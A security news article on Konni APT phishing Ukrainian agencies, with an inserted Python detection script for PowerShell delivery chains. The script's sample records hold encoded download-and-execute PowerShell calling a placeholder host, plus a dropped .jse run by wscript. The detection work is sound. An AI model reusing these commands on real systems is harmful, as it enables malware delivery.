
The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting Ukrainian government agencies, indicating that the group's targeting extends beyond Russia.
Enterprise security company Proofpoint said the campaign's ultimate goal was to gather intelligence about the “trajectory of the Russian invasion.”
“The group's interest in Ukraine follows historical targeting of Russian government agencies for the purposes of strategic intelligence gathering,” security researchers Greg Lesnewich, Saher Naumaan and Mark Kelly said in a report shared with The Hacker News.
Also known as Opal Sleet, Osmium, TA406 and Vedalia, Konni APT is a cyber espionage group with a history of targeting entities in South Korea, the US and Russia. It has been operational since at least 2014.
Attack chains mounted by the threat actor often use phishing emails to distribute malware called Konni RAT (also known as UpDog) and to redirect recipients to credential harvesting pages. In an analysis of the threat group published in November 2021, Proofpoint described TA406 as one of several actors that make up the activity publicly tracked as Kimsuky, Thallium and the Konni Group.
The latest attacks documented by the cybersecurity company involve phishing emails impersonating a fictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, which is itself a non-existent organization.
The email messages contain a link to a password-protected RAR archive hosted on the MEGA cloud service. Opening the RAR archive with the password listed in the message body launches an infection sequence designed to conduct extensive reconnaissance of the compromised machine.

Specifically, the RAR archive contains a CHM file that displays decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi. If the victim clicks anywhere on the page, a PowerShell command embedded within the HTML is executed, reaching out to an external server to download the next-stage PowerShell payload.
The newly launched PowerShell script runs various commands to gather information about the system, encodes the output using Base64 and sends it to the same server.
“The actor sent multiple phishing emails, when the link was not clicked, asking the target if they had received the previous email and if they wanted to download the file,” the researchers said.
Proofpoint also observed HTML files being distributed directly as attachments to phishing messages. In this variation of the attack, the victim is instructed to click on a link embedded in the HTML file, which results in the download of a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file.
When the LNK is run, it executes Base64-encoded PowerShell to drop a JScript-encoded (JSE) file called “themes.jse” via Visual Basic Script. The JSE malware contacts an attacker-controlled URL and executes the response from the server via PowerShell. The exact nature of the payload is currently unknown.
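The two delivery chains above (CHM decoy launching PowerShell that fetches a second stage, and an LNK running encoded PowerShell that drops and executes themes.jse) leave a recognisable parent/child trail in endpoint process-creation telemetry. The following Python script is an added, defender-side example and is not code from Proofpoint or from the original article: it runs a handful of constructed process-creation records (field names assumed to mirror Sysmon process-creation events; paths, user names and the host stage.example.invalid are all made up) through three checks that map onto those chains, and it decodes PowerShell's -EncodedCommand argument (UTF-16LE then Base64) so the decoded text can be inspected for download cues or a dropped script-host file.

```python
import base64
import re
from typing import Dict, List


def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; returns '' when the blob is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return ""


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"

# Constructed sample records (Sysmon Event ID 1 style), not real telemetry.
# 'stage.example.invalid' is an assumed, non-routable placeholder host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # CHM chain: the HTML Help viewer (hh.exe) spawns PowerShell that fetches the next stage
        "parent_image": r"C:\Windows\hh.exe",
        "image": PS,
        "command_line": "powershell.exe -w hidden -enc "
        + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s2.ps1')"),
    },
    {   # LNK chain: encoded PowerShell writes themes.jse and hands it to the script host
        "parent_image": r"C:\Windows\explorer.exe",
        "image": PS,
        "command_line": "powershell.exe -NoP -ep bypass -EncodedCommand "
        + encode_ps("Set-Content -Path $env:TEMP\\themes.jse -Value $payload; wscript $env:TEMP\\themes.jse"),
    },
    {   # LNK chain, next hop: wscript.exe executing the dropped .jse
        "parent_image": PS,
        "image": WSCRIPT,
        "command_line": r"wscript.exe C:\Users\user\AppData\Local\Temp\themes.jse",
    },
    {   # Benign: encoded command used by an admin, no download cue, no script drop
        "parent_image": r"C:\Windows\explorer.exe",
        "image": PS,
        "command_line": "powershell.exe -EncodedCommand "
        + encode_ps("Get-Service | Where-Object Status -eq 'Stopped'"),
    },
    {   # Benign: a .vbs logon script under the script host
        "parent_image": r"C:\Windows\System32\userinit.exe",
        "image": WSCRIPT,
        "command_line": r"wscript.exe //B \\fileserver\netlogon\map_drives.vbs",
    },
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the pattern deliberately excludes -ExecutionPolicy and -ep.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "net.webclient", "invoke-restmethod")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per matched rule; an event may trigger several rules."""
    findings: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        parent, child, cmd = basename(ev["parent_image"]), basename(ev["image"]), ev["command_line"]
        # Rule 1: a compiled help file should never need a shell.
        if parent == "hh.exe" and child in SHELLS:
            findings.append({"event": idx, "rule": "chm_spawned_shell", "detail": cmd})
        # Rule 2: decode -EncodedCommand and inspect the plaintext instead of the Base64.
        if child in ("powershell.exe", "pwsh.exe"):
            m = ENCODED_ARG.search(cmd)
            if m:
                decoded = decode_ps(m.group(1))
                low = decoded.lower()
                if any(cue in low for cue in DOWNLOAD_CUES):
                    findings.append({"event": idx, "rule": "encoded_ps_downloader", "detail": decoded})
                if ".jse" in low or "wscript" in low or "cscript" in low:
                    findings.append({"event": idx, "rule": "encoded_ps_drops_script", "detail": decoded})
        # Rule 3: the Windows script host running an encoded JScript file.
        if child in SCRIPT_HOSTS and ".jse" in cmd.lower():
            findings.append({"event": idx, "rule": "script_host_runs_jse", "detail": cmd})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']}: {f['detail']}")
```

The first sample record triggers both the CHM-parent rule and the decoded-downloader rule, the second and third records each trigger one rule of the LNK chain, and the two benign records produce no findings. In production the same three checks would be expressed as a SIEM or EDR query over the real process-creation fields; the value of decoding the argument first is that a Base64 blob cannot be matched on keywords, while the plaintext can.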
Additionally, TA406 has attempted to harvest credentials by sending fake Microsoft security alert messages from Proton Mail accounts to Ukrainian government entities, warning recipients of suspicious sign-in activity from IP addresses in the US and prompting them to follow a link to confirm their login.
The credential harvesting page has not been recovered, but the same compromised domain is said to have been used in the past to collect Naver login information.
“These credential harvesting campaigns were conducted prior to the attempts to deploy malware and targeted some of the same users who would later be targeted in the HTML delivery campaign,” Proofpoint said. “TA406 is very likely gathering intelligence to help North Korea's leadership determine the current risk to its forces already in the theater, but it could also help gauge whether Russia will demand more troops.”
“Unlike Russian groups that collect tactical battlefield information and are tasked with targeting Ukrainian forces on the spot, TA406 usually focuses on more strategic political intelligence gathering efforts.”

The disclosure comes as the Konni Group has been linked to a sophisticated multi-stage malware campaign targeting entities in South Korea, which uses ZIP archives containing LNK files that run PowerShell scripts to extract CAB archives, ultimately delivering batch-script malware that collects sensitive data and sends it to remote servers.
The findings also coincide with a spear-phishing campaign orchestrated by Kimsuky to target South Korean government agencies by delivering stealer malware that can establish command-and-control (C2 or C&C) communications and steal files, web browser data and cryptocurrency wallet information.

According to South Korean cybersecurity company AhnLab, Kimsuky has also been observed propagating PebbleDash as part of a multi-stage infection sequence initiated via spear phishing. The trojan was attributed to the Lazarus Group by the US government in May 2020.
“The Kimsuky Group uses a variety of malware, but in the case of PebbleDash, it launches the attack by running malware based on an LNK file delivered by spear phishing in the initial access phase.”

“The next step is to create a scheduled task using a PowerShell script and register it for autorun. Through communication with Dropbox and TCP socket-based C&C servers, the group installs multiple malware and tools, including PebbleDash.”
Konni and Kimsuky are far from the only North Korean threat actors focused on South Korea. In March 2025, South Korean entities were found to be on the receiving end of another campaign run by APT37, which is also known as ScarCruft.
Called Operation ToyBox Story, it singled out several activists focused on North Korea, according to the Genians Security Center (GSC). The first observed spear-phishing attack occurred on March 8, 2025.
“The email contained a Dropbox link that led to a compressed archive containing a malicious shortcut (LNK) file,” the South Korean company said. “When extracted and executed, the LNK file activated additional malware containing the keyword ‘toy’.”

The LNK file is configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named TOY03.BAT, TOY02.BAT and TOY01.BAT.
RokRAT is equipped to collect system information, capture screenshots and use three different cloud services, pCloud, Yandex and Dropbox, for command and control.
“Threat actors continued to modify shortcut (LNK) files, focusing on fileless attack techniques, in order to use legitimate cloud services as C2 infrastructure and avoid detection by anti-virus software installed on target endpoints,” Genians said.